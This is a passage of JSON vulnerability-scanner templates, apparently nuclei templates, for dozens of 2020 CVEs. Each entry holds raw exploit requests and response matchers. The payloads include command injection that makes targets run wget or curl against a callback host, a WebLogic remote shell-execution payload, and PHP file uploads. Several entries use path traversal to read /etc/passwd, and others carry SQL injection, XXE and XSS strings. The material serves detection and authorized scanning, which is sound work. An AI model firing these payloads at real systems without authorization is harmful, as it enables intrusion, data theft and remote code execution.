ID: (.*)"],"part":"body"}]}]},{"id":"CVE-2020-35476","info":{"name":"OpenTSDB <=2.4.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://{{interactsh-url}}%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["plotted","timing","cachehit"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26214","info":{"name":"Alerta < 8.1.0 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/config"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 8.1.0')"]},{"type":"word","part":"body","words":["\"alarm_model\"","\"actions\"","\"severity\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"name\": \"Alerta ([0-9.]+)\""],"internal":true},{"type":"regex","group":1,"regex":["\"name\": \"Alerta ([0-9.]+)\""]}]}]},{"id":"CVE-2020-18268","info":{"name":"Z-Blog <=1.5.2 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /zb_system/cmd.php?act=verify HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 81\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nbtnPost=Log+In&username={{username}}&password={{md5(\"{{password}}\")}}&savedate=0\n","GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-15920","info":{"name":"Mida eFramework <=2.9.0 - Remote Command Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14750","info":{"name":"Oracle WebLogic Server - Remote Command Execution","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /console/css/%252e%252e%252fconsole.portal HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\ncmd: curl {{interactsh-url}}\nContent-Type: application/x-www-form-urlencoded\n\n_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\nweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\njava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\"connectionHandler\");\nfield.setAccessible(true);\nObject obj = field.get(adapter);\nweblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod(\"getServletRequest\").invoke(obj);\nString cmd = req.getHeader(\"cmd\");\nString[] cmds = System.getProperty(\"os.name\").toLowerCase().contains(\"window\") ? new String[]{\"cmd.exe\", \"/c\", cmd} : new String[]{\"/bin/sh\", \"-c\", cmd};\nif (cmd != null) {\n    String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter(\"\\\\A\").next();\n    weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod(\"getResponse\").invoke(req);\n    res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));\n    res.getServletOutputStream().flush();\n    res.getWriter().write(\"\");\n}executeThread.interrupt();\n\");\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["ADMINCONSOLESESSION="]},{"type":"regex","part":"body","regex":["<html><head></head><body>(.*)</body></html>"]}]}]},{"id":"CVE-2020-4463","info":{"name":"IBM Maximo Asset Management Information Disclosure - XML External Entity Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/os/mxperson","{{BaseURL}}/meaweb/os/mxperson"],"body":"<?xml version='1.0' encoding='UTF-8'?>\n<max:QueryMXPERSON xmlns:max='http://www.ibm.com/maximo'>\n  <max:MXPERSONQuery></max:MXPERSONQuery>\n</max:QueryMXPERSON>\n","headers":{"Content-Type":"application/xml"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["QueryMXPERSONResponse","MXPERSONSet"]},{"type":"word","part":"header","words":["application/xml"]}]}]},{"id":"CVE-2020-24186","info":{"name":"WordPress wpDiscuz <=7.0.4 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /?p=1 HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"action\"\n\nwmuUploadFiles\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"wmu_nonce\"\n\n{{wmuSecurity}}\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"wmuAttachmentsData\"\n\nundefined\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"wmu_files[0]\"; filename=\"rce.php\"\nContent-Type: image/png\n\n{{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}\n<?php phpinfo();?>\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"postId\"\n\n1\n------WebKitFormBoundary88AhjLimsDMHU1Ak--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["success\":true","fullname","shortname","url"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"wmuSecurity","group":1,"regex":["wmuSecurity\":\"([a-z0-9]+)"],"internal":true,"part":"body"},{"type":"regex","group":1,"regex":["\"url\":\"([a-z:\\\\/0-9-.]+)\""],"part":"body"}]}]},{"id":"CVE-2020-24579","info":{"name":"D-Link DSL 2888a - Authentication Bypass/Remote Command Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nCookie: uid=6gPjT2ipmNz\n\nusername=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b\n","GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nCookie: uid=6gPjT2ipmNz\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["nobody:[x*]:65534:65534","root:.*:0:0:"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11798","info":{"name":"Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/awcuser/cgi-bin/vcs_access_file.cgi?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/x-download","filename=passwd"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-36510","info":{"name":"WordPress 15Zine <3.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/themes/15zine/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/themes/15zine/assets/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9043","info":{"name":"WordPress wpCentral <1.5.1 - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/index.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-login.php?action=logout&_wpnonce={{nonce}} HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key={{authkey}} HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(header_4, 'text/html')","status_code_4 == 200","contains(body_4, 'wpCentral Connection Key')","contains(body_4, \"pagenow = \\'dashboard\\'\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"authkey","group":1,"regex":["style=\"word-wrap:break-word;\">([a-z0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-z]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-13158","info":{"name":"Artica Proxy Community Edition <4.30.000000 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15129","info":{"name":"Traefik - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"X-Forwarded-Prefix":"https://foo.nl"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"https://foo.nl/dashboard/\">Found</a>"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2020-25078","info":{"name":"D-Link DCS-2530L/DCS-2670L  - Administrator Password Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/config/getuser?index=0"],"matchers-condition":"and","matchers":[{"type":"word","words":["name=","pass="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25780","info":{"name":"Commvault CommCell - Local File Inclusion","severity":"high"},"requests":[{"method":"POST","path":["http://{{Host}}:81/SearchSvc/CVSearchService.svc"],"body":"<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:tem=\"http://tempuri.org/\">\n   <soapenv:Header/>\n   <soapenv:Body>\n      <tem:downLoadFile>\n         <tem:path>c:/Windows/system.ini</tem:path>\n      </tem:downLoadFile>\n   </soapenv:Body>\n</soapenv:Envelope>\n","headers":{"Cookie":"Login","soapaction":"http://tempuri.org/ICVSearchSvc/downLoadFile","content-type":"text/xml"},"matchers-condition":"and","matchers":[{"type":"word","words":["downLoadFileResult"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35598","info":{"name":"Advanced Comment System 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26919","info":{"name":"NETGEAR ProSAFE Plus - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /login.htm HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\nsubmitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd=\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-35774","info":{"name":"twitter-server Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/histograms?h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&fmt=plot_cdf&log_scale=true"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8497","info":{"name":"Artica Pandora FMS <=7.42 - Arbitrary File Read","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pandora_console/attachment/pandora_chat.log.json.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"type\"","\"id_user\"","\"user_name\"","\"text\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27481","info":{"name":"Good Layers LMS Plugin <= 2.1.4 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=gdlr_lms_cancel_booking&id=(SELECT%201337%20FROM%20(SELECT(SLEEP(6)))MrMV)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, 'goodlayers-lms') || contains(body, 'goodlms')"],"condition":"and"}]}]},{"id":"CVE-2020-5776","info":{"name":"MAGMI - Cross-Site Request Forgery","severity":"high"},"requests":[{"raw":["POST /magmi/web/magmi_saveprofile.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nprofile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=\n","POST /magmi/web/magmi_run.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nengine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update\n","GET /magmi/web/info.php HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8641","info":{"name":"Lotus Core CMS 1.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page_slug=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11853","info":{"name":"Micro Focus Operations Bridge Manager <=2020.05 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ucmdb-api/connect"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["HttpUcmdbServiceProviderFactoryImpl","ServerVersion=11.6.0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8982","info":{"name":"Citrix ShareFile StorageZones <=5.10.x - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28429","info":{"name":"geojson2kml - Command Injection","severity":"critical"},"requests":[{"raw":["POST /convert HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"fileName\": \"& echo \\\"{{randstr}}\\\" > {{filename}}.txt && ls\",\n  \"geoJsonData\": {\n    \"type\": \"FeatureCollection\",\n    \"features\": [\n      {\n        \"type\": \"Feature\",\n        \"geometry\": {\n          \"type\": \"Point\",\n          \"coordinates\": [102.0, 0.5]\n        },\n        \"properties\": {\n          \"prop0\": \"value0\"\n        }\n      }\n    ]\n  }\n}\n","GET /file/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{randstr}}"]},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8615","info":{"name":"Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type_2, \"application/json\")","contains(body_2, \"success\") && contains(body_2, \"true\") && contains(body_2, \"Instructor has been added successfully\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2020-11530","info":{"name":"WordPress Chop Slider 3 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 10s\nGET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/javascript\")","contains(body, \"$(document).ready(function()\")"],"condition":"and"}]}]},{"id":"CVE-2020-11978","info":{"name":"Apache Airflow <=1.10.10 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /api/experimental/test HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"conf\": {\"message\": \"\\\"; touch test #\"}}\n","GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_4, \"operator\":\"BashOperator\")","contains(header_4, \"application/json\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"exec_date","group":1,"regex":["\"execution_date\":\"([0-9-A-Z:+]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-24589","info":{"name":"WSO2 API Manager <=3.1.0 - Blind XML External Entity Injection","severity":"critical"},"requests":[{"raw":["POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npayload=<%3fxml+version%3d\"1.0\"+%3f><!DOCTYPE+a+[+<!ENTITY+%25+xxe+SYSTEM+\"http%3a//{{interactsh-url}}\">%25xxe%3b]>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["Failed to install the generic artifact type"]}]}]},{"id":"CVE-2020-17519","info":{"name":"Apache Flink - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35847","info":{"name":"Agentejo Cockpit <0.11.2 - NoSQL Injection","severity":"critical"},"requests":[{"raw":["POST /auth/requestreset HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"user\": {\n    \"$func\": \"var_dump\"\n  }\n}\n","POST /auth/requestreset HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"user\": {\n    \"$func\": \"nonexistent_function\"\n  }\n}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body_1","regex":["string\\([0-9]{1,3}\\)(\\s)?\"([A-Za-z0-9-.@\\s-]+)\""]},{"type":"regex","part":"body_1","negative":true,"regex":["string\\([0-9]{1,3}\\)(\\s)?\"(error404)([A-Za-z0-9-.@\\s-]+)\""]},{"type":"regex","part":"body_2","negative":true,"regex":["string\\([0-9]{1,3}\\)(\\s)?\"([A-Za-z0-9-.@\\s-]+)\""]}]}]},{"id":"CVE-2020-29227","info":{"name":"Car Rental Management System 1.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page=/etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12447","info":{"name":"Onkyo TX-NR585 Web Interface - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27866","info":{"name":"NETGEAR - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Debug Enable!"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13379","info":{"name":"Grafana 3.0.1-7.0.1 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1","{{BaseURL}}/grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["cloudflare.com","dns"],"condition":"and"},{"type":"word","part":"header","words":["image/jpeg"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17456","info":{"name":"SEOWON INTECH SLC-130 & SLR-120S - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nbrowserTime=081119502020&currentTime=1597159205&expires=Wed%252C%2B12%2BAug%2B2020%2B15%253A20%253A05%2BGMT&Command=Submit&user=admin&password=admin\n","POST /cgi-bin/system_log.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nCommand=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5405","info":{"name":"Spring Cloud Config - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8772","info":{"name":"WordPress InfiniteWP <1.9.4.5 - Authorization Bypass","severity":"critical"},"requests":[{"raw":["GET /?author=1 HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Language: en-US,en;q=0.9\n","POST / HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded\n\n_IWP_JSON_PREFIX_{{base64(\"{\\\"iwp_action\\\":\\\"add_site\\\",\\\"params\\\":{\\\"username\\\":\\\"{{username}}\\\"}}\")}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["wordpress_logged_in"]},{"type":"word","part":"body","words":["<IWPHEADER>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username","group":1,"regex":["Author:(?:[A-Za-z0-9 -\\_=\"]+)?<span(?:[A-Za-z0-9 -\\_=\"]+)?>([A-Za-z0-9]+)<\\/span>"],"internal":true,"part":"body"},{"type":"regex","name":"username","group":1,"regex":["ion: https:\\/\\/[a-z0-9.]+\\/author\\/([a-z]+)\\/"],"internal":true,"part":"header"}]}]},{"id":"CVE-2020-24571","info":{"name":"NexusDB <4.50.23 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[extensions]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12259","info":{"name":"rConfig 3.9.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n","GET /configDevice.php?rid=\"><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\") && contains(body_3, \"rConfig - Configuration Management\")","contains(content_type_3, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2020-27361","info":{"name":"Akkadian Provisioning Manager 4.50.02 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pme/media/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of /pme/media","Parent Directory"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19360","info":{"name":"FHEM 6.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17362","info":{"name":"Nova Lite < 1.3.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"body","words":["nova-lite"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24949","info":{"name":"PHP-Fusion 9.03.50 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/infusions/downloads/downloads.php?cat_id=${system(ls)}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["infusion_db.php"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5847","info":{"name":"UnRaid <=6.80 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["b13928fbcfff659363d7c7d1ec008d56"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17506","info":{"name":"Artica Web Proxy 4.30 - Authentication Bypass/SQL 